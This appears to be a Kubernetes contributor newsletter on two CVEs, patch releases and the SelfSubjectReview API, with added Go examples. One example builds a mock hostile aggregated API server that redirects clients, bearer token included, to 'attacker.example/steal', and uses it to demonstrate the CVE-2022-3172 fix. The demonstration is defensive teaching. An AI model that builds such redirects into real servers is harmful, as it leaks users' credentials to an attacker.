Two security reports this week: CVE-2022-3172, in which an aggregated API server could redirect client traffic (and the credentials the client sends with it) to a host of its choosing, and CVE-2021-25749, which could let Windows container workloads run as ContainerAdministrator even when runAsNonRoot is set. Both issues are fixed in the latest patch releases. Note that the patch for CVE-2022-3172 makes kube-apiserver reject all 3xx responses from aggregated API servers by default, so test after upgrading and be prepared to set --aggregator-reject-forwarding-redirect=false if an aggregated API server you depend on legitimately uses redirects.
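The CVE-2022-3172 fix in one picture, as an added example (not Kubernetes' own code): a Go reverse proxy plays the aggregator in front of a backend that plays a hostile aggregated API server. The backend, the attacker host name and the bearer token are all constructed for the example; the hardened proxy's rejection of 3xx answers mirrors what --aggregator-reject-forwarding-redirect does by default after the patch, reduced to a httputil.ReverseProxy ModifyResponse hook.

```go
package main

import (
	"errors"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
)

// errRedirect is what the hardened proxy returns when the backend answers with a 3xx.
var errRedirect = errors.New("aggregated server attempted to redirect the client")

// Result is what the client observed through one proxy.
type Result struct {
	Status   int
	Location string
}

// newBackend stands in for a malicious or compromised aggregated API server
// (constructed for this example): it answers every request with a 302 to an
// attacker-chosen host. A client that follows it would resend its bearer token there.
func newBackend(target string) *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, target, http.StatusFound)
	}))
}

// newProxy plays the aggregator: a reverse proxy in front of backendURL.
// rejectRedirects=false forwards the backend's 3xx untouched (pre-patch behaviour);
// rejectRedirects=true turns any 3xx into a 502 so the Location header never reaches the client.
func newProxy(backendURL string, rejectRedirects bool) (*httptest.Server, error) {
	u, err := url.Parse(backendURL)
	if err != nil {
		return nil, err
	}
	rp := httputil.NewSingleHostReverseProxy(u)
	if rejectRedirects {
		rp.ModifyResponse = func(resp *http.Response) error {
			if resp.StatusCode >= 300 && resp.StatusCode < 400 {
				return errRedirect
			}
			return nil
		}
		// ModifyResponse errors land here; the backend response is discarded and replaced.
		rp.ErrorHandler = func(w http.ResponseWriter, r *http.Request, err error) {
			http.Error(w, err.Error(), http.StatusBadGateway)
		}
	}
	return httptest.NewServer(rp), nil
}

// probe sends one authenticated request through the proxy with a client that does not
// follow redirects, so we see exactly which status and Location the proxy handed back.
func probe(proxyURL string) (Result, error) {
	client := &http.Client{
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
	req, err := http.NewRequest(http.MethodGet, proxyURL+"/apis/example.io/v1/things", nil)
	if err != nil {
		return Result{}, err
	}
	req.Header.Set("Authorization", "Bearer constructed-token")
	resp, err := client.Do(req)
	if err != nil {
		return Result{}, err
	}
	defer resp.Body.Close()
	_, _ = io.Copy(io.Discard, resp.Body)
	return Result{Status: resp.StatusCode, Location: resp.Header.Get("Location")}, nil
}

// Run wires backend, proxy and client together for one setting of rejectRedirects.
func Run(rejectRedirects bool) (Result, error) {
	backend := newBackend("http://attacker.example/steal")
	defer backend.Close()
	proxy, err := newProxy(backend.URL, rejectRedirects)
	if err != nil {
		return Result{}, err
	}
	defer proxy.Close()
	return probe(proxy.URL)
}

func main() {
	for _, reject := range []bool{false, true} {
		r, err := Run(reject)
		if err != nil {
			fmt.Println("error:", err)
			return
		}
		fmt.Printf("reject redirects=%-5v -> status %d, Location=%q\n", reject, r.Status, r.Location)
	}
}
```

With rejection off the client receives the backend's 302 and its Location verbatim; a real client that follows redirects would replay its Authorization header against that host. With rejection on it receives a 502 and no Location at all, which is the trade-off behind testing aggregated API servers that rely on redirects after upgrading.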
The Contributor Summit CfP is still open.
Next Deadline: Production Readiness Review, September 29th
Have your draft KEPs ready for the PRR team by next Thursday, and final versions opted-in by October 6th. Current CI signal is green.
Patch releases for 1.25.1, 1.24.5, 1.23.11, and 1.22.14 came out last week. In addition to the above security issues, these patches fix a large number of bugs discovered during 1.25 Code Freeze and backported, as well as updating Go for all versions.
For a long time, the TokenReview API under authentication.k8s.io/v1 has allowed resolving a cluster JWT, such as a ServiceAccount token, to the user details behind it. That lets you check the identity of credentials presented by another party, but not the identity the API server attributes to your own. The newly added SelfSubjectReview API fills that gap: any user can ask kube-apiserver what username, UID, groups and extra attributes it sees for them. That is useful both for debugging user configurations with the new kubectl auth whoami and for diagnosing server-side authenticator (webhook, OIDC and similar) configuration issues. Check it out if you maintain any automated troubleshooting tools or self-diagnostic systems.
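As an added example (not kube-apiserver's or kubectl's code), the exchange behind kubectl auth whoami in Go: the client POSTs an empty SelfSubjectReview and reads status.userInfo back, plus a CheckIdentity helper of the kind a self-diagnostic tool would run on the result. The in-process server, its two bearer tokens and the identities they map to are constructed for the example; the alpha group/version and path are an assumption to confirm with kubectl api-resources on your cluster.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// UserInfo mirrors the userInfo block kube-apiserver fills into the review's status
// (uid and extra omitted here for brevity).
type UserInfo struct {
	Username string   `json:"username"`
	Groups   []string `json:"groups,omitempty"`
}

type ssrStatus struct {
	UserInfo UserInfo `json:"userInfo"`
}

// SelfSubjectReview is both request body and response: the client sends no spec at all,
// the server fills status.userInfo from whatever credential it just authenticated.
type SelfSubjectReview struct {
	APIVersion string     `json:"apiVersion"`
	Kind       string     `json:"kind"`
	Status     *ssrStatus `json:"status,omitempty"`
}

const ssrAPIVersion = "authentication.k8s.io/v1alpha1" // assumption: alpha API, confirm with kubectl api-resources
const ssrPath = "/apis/" + ssrAPIVersion + "/selfsubjectreviews"

// WhoAmI POSTs an empty SelfSubjectReview under the given bearer token and returns the
// identity the server attributes to it, which is what `kubectl auth whoami` displays.
func WhoAmI(client *http.Client, baseURL, token string) (UserInfo, error) {
	body, _ := json.Marshal(SelfSubjectReview{APIVersion: ssrAPIVersion, Kind: "SelfSubjectReview"})
	req, err := http.NewRequest(http.MethodPost, baseURL+ssrPath, bytes.NewReader(body))
	if err != nil {
		return UserInfo{}, err
	}
	req.Header.Set("Authorization", "Bearer "+token)
	req.Header.Set("Content-Type", "application/json")
	resp, err := client.Do(req)
	if err != nil {
		return UserInfo{}, err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusCreated && resp.StatusCode != http.StatusOK {
		return UserInfo{}, fmt.Errorf("selfsubjectreview: unexpected HTTP %d", resp.StatusCode)
	}
	var out SelfSubjectReview
	if err := json.NewDecoder(resp.Body).Decode(&out); err != nil || out.Status == nil {
		return UserInfo{}, fmt.Errorf("selfsubjectreview: bad or empty response: %v", err)
	}
	return out.Status.UserInfo, nil
}

// CheckIdentity is the self-diagnostic half: nil when the server sees the caller as
// wantUser holding every group in wantGroups, otherwise an error naming the mismatch.
func CheckIdentity(got UserInfo, wantUser string, wantGroups ...string) error {
	if got.Username != wantUser {
		return fmt.Errorf("server sees %q, expected %q: wrong kubeconfig context or credential plugin?", got.Username, wantUser)
	}
	have := map[string]bool{}
	for _, g := range got.Groups {
		have[g] = true
	}
	for _, g := range wantGroups {
		if !have[g] {
			return fmt.Errorf("%s lacks group %q: check the authenticator's group mapping", got.Username, g)
		}
	}
	return nil
}

// NewFakeAPIServer stands in for kube-apiserver (constructed for this example): two
// made-up bearer tokens map to the identities the real server would derive from them.
func NewFakeAPIServer() *httptest.Server {
	identities := map[string]UserInfo{
		"sa-token":    {Username: "system:serviceaccount:dev:ci-runner", Groups: []string{"system:serviceaccounts", "system:serviceaccounts:dev", "system:authenticated"}},
		"admin-token": {Username: "alice", Groups: []string{"system:masters", "system:authenticated"}},
	}
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		info, ok := identities[strings.TrimPrefix(r.Header.Get("Authorization"), "Bearer ")]
		if r.Method != http.MethodPost || r.URL.Path != ssrPath {
			http.NotFound(w, r)
		} else if !ok {
			http.Error(w, "Unauthorized", http.StatusUnauthorized)
		} else {
			w.Header().Set("Content-Type", "application/json")
			w.WriteHeader(http.StatusCreated) // create requests answer 201
			_ = json.NewEncoder(w).Encode(SelfSubjectReview{APIVersion: ssrAPIVersion, Kind: "SelfSubjectReview", Status: &ssrStatus{UserInfo: info}})
		}
	}))
}

func main() {
	srv := NewFakeAPIServer()
	defer srv.Close()
	info, err := WhoAmI(srv.Client(), srv.URL, "sa-token")
	fmt.Println(info, err)
	fmt.Println(CheckIdentity(info, "system:serviceaccount:dev:ci-runner", "system:masters"))
}
```

Against a real cluster, replace the fake server with the API server URL and a real token (or a transport carrying the kubeconfig's client certificate); the request and response shapes stay the same, and the CheckIdentity error strings are the kind of message a troubleshooting tool can surface directly.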
Last Week In Kubernetes Development (LWKD) is a product of multiple contributors participating in Kubernetes SIG Contributor Experience. All original content is licensed Creative Commons Share-Alike, although linked content and images may be differently licensed. LWKD does collect some information on readers, see our privacy notice for details.
You may contribute to LWKD by submitting pull requests or issues on the LWKD GitHub repo.